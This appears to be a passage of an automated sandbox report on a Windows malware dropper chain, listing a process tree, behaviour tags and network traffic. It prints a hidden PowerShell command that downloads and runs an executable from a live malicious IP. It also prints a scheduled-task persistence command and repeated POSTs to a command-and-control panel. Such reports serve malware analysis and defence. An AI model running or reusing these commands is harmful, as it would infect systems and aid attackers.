                                                                                      PID:1816
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:4588
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5244
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                    8⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:5084
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta
                                                                                  7⤵
                                                                                  • Checks computer location settings
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5012
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                    8⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Downloads MZ/PE file
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4288
                                                                                    • C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE
                                                                                      "C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"
                                                                                      9⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2664
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe"
                                                                                6⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Drops file in Windows directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5404
                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                  7⤵
                                                                                  • Downloads MZ/PE file
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  PID:5356
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3060
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:6772
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3380
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5380
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 828
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:5680
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6740
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6720
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6756
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 976
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6776
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:7048
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1880
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6420
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 960
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6508
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5160
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6352
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1372
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 808
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6816
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe"
                                                                                    8⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5752
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe"
                                                                                    8⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6564
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6828
                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5148
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:6388
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe"
                                                                                6⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:7104
                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  7⤵
                                                                                    PID:6868
                                                                       • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Checks BIOS information in registry
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                         • Suspicious behavior: EnumeratesProcesses
                                                                         PID:2276
                                                                       • C:\ProgramData\cqgurj\okhxpkh.exe
                                                                         C:\ProgramData\cqgurj\okhxpkh.exe start2
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Checks BIOS information in registry
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                         • System Location Discovery: System Language Discovery
                                                                         • Suspicious behavior: EnumeratesProcesses
                                                                         PID:2432
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3360 -ip 3360
                                                                         1⤵
                                                                         PID:4360
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3952 -ip 3952
                                                                         1⤵
                                                                         PID:1904
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1948 -ip 1948
                                                                         1⤵
                                                                         PID:3320
                                                                       • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                         "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                         1⤵
                                                                         PID:2640
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5604 -ip 5604
                                                                         1⤵
                                                                         PID:5712
                                                                       • C:\Windows\system32\svchost.exe
                                                                         C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                         1⤵
                                                                         PID:6120
                                                                       • C:\ProgramData\wqbs\lpsbw.exe
                                                                         C:\ProgramData\wqbs\lpsbw.exe start2
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Checks BIOS information in registry
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                         • System Location Discovery: System Language Discovery
                                                                         PID:5816
                                                                       • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Checks BIOS information in registry
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                         PID:4544
                                                                       • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                         "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                         1⤵
                                                                         PID:5652
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3380 -ip 3380
                                                                         1⤵
                                                                         PID:3784
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6740 -ip 6740
                                                                         1⤵
                                                                         PID:6764
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1880 -ip 1880
                                                                         1⤵
                                                                         PID:4580
                                                                       • C:\Windows\SysWOW64\WerFault.exe
                                                                         C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5160 -ip 5160
                                                                         1⤵
                                                                         PID:6284
                                                                       • C:\ProgramData\wqbs\lpsbw.exe
                                                                         C:\ProgramData\wqbs\lpsbw.exe start2
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         PID:5680
                                                                       • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                         1⤵
                                                                         • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                         • Executes dropped EXE
                                                                         • Identifies Wine through registry keys
                                                                         PID:5944

                                                                       Network

                                                                       • flag-us
                                                                         DNS
                                                                         g.bing.com
                                                                         Remote address:
                                                                         8.8.8.8:53
                                                                         Request
                                                                         g.bing.com
                                                                         IN A
                                                                         Response
                                                                         g.bing.com
                                                                         IN CNAME
                                                                         g-bing-com.ax-0001.ax-msedge.net
                                                                         g-bing-com.ax-0001.ax-msedge.net
                                                                         IN CNAME
                                                                         ax-0001.ax-msedge.net
                                                                         ax-0001.ax-msedge.net
                                                                         IN A
                                                                         150.171.28.10
                                                                         ax-0001.ax-msedge.net
                                                                         IN A
                                                                         150.171.27.10
                                                                       • flag-us
                                                                         GET
                                                                         https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                         Remote address:
                                                                         150.171.28.10:443
                                                                         Request
                                                                         GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                         host: g.bing.com
                                                                         accept-encoding: gzip, deflate
                                                                         user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                         Response
                                                                         HTTP/2.0 204
                                                                         cache-control: no-cache, must-revalidate
                                                                         pragma: no-cache
                                                                         expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                         set-cookie: MUID=18AA9BB124A167FF18248E28252A66FD; domain=.bing.com; expires=Tue, 17-Mar-2026 00:32:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                         strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                         access-control-allow-origin: *
                                                                         x-cache: CONFIG_NOCACHE
                                                                         accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                         x-msedge-ref: Ref A: AA20FE8ED165493ABE0D959835BE1851 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                         date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                       • flag-us
                                                                         GET
                                                                         https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                         Remote address:
                                                                         150.171.28.10:443
                                                                         Request
                                                                         GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                         host: g.bing.com
                                                                         accept-encoding: gzip, deflate
                                                                         user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                         cookie: MUID=18AA9BB124A167FF18248E28252A66FD
                                                                         Response
                                                                         HTTP/2.0 204
                                                                         cache-control: no-cache, must-revalidate
                                                                         pragma: no-cache
                                                                         expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                         set-cookie: MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ; domain=.bing.com; expires=Tue, 17-Mar-2026 00:32:32 GMT; path=/; Partitioned; secure; SameSite=None
                                                                         strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                         access-control-allow-origin: *
                                                                         x-cache: CONFIG_NOCACHE
                                                                         accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                         x-msedge-ref: Ref A: B145BE659973450DB626DFB2D5124F08 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                         date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                       • flag-us
                                                                         GET
                                                                         https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                         Remote address:
                                                                         150.171.28.10:443
                                                                         Request
                                                                         GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                         host: g.bing.com
                                                                         accept-encoding: gzip, deflate
                                                                         user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                         cookie: MUID=18AA9BB124A167FF18248E28252A66FD; MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ
                                                                         Response
                                                                         HTTP/2.0 204
                                                                         cache-control: no-cache, must-revalidate
                                                                         pragma: no-cache
                                                                         expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                         strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                         access-control-allow-origin: *
                                                                         x-cache: CONFIG_NOCACHE
                                                                         accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                         x-msedge-ref: Ref A: 8ECE3F0CB8824EAAB6E36B289EA9EB60 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                         date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                       • flag-gb
                                                                         GET
                                                                         https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
                                                                         Remote address:
                                                                         2.18.27.82:443
                                                                         Request
                                                                         GET /th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90 HTTP/2.0
                                                                         host: www.bing.com
                                                                         accept: */*
                                                                         cookie: MUID=18AA9BB124A167FF18248E28252A66FD; MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ
                                                                         accept-encoding: gzip, deflate, br
                                                                         user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                         Response
                                                                         HTTP/2.0 200
                                                                         cache-control: public, max-age=2592000
                                                                         content-type: image/jpeg
                                                                         access-control-allow-origin: *
                                                                         access-control-allow-headers: *
                                                                         access-control-allow-methods: GET, POST, OPTIONS
                                                                         timing-allow-origin: *
                                                                         report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
                                                                         nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                         content-length: 1981
                                                                         date: Thu, 20 Feb 2025 00:32:34 GMT
                                                                         alt-svc: h3=":443"; ma=93600
                                                                         x-cdn-traceid: 0.4c1a1202.1740011554.3ac29587
                                                                       • flag-ru
                                                                         GET
                                                                         http://185.215.113.16/mine/random.exe
                                                                         powershell.exe
                                                                         Remote address:
                                                                         185.215.113.16:80
                                                                         Request
                                                                         GET /mine/random.exe HTTP/1.1
                                                                         Host: 185.215.113.16
                                                                         Connection: Keep-Alive
                                                                         Response
                                                                         HTTP/1.1 200 OK
                                                                         Server: nginx/1.18.0 (Ubuntu)
                                                                         Date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2134016
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d3d-209000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 4
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:53 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Refresh: 0; url = Login.php
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 158
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:55 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:59 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:07 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
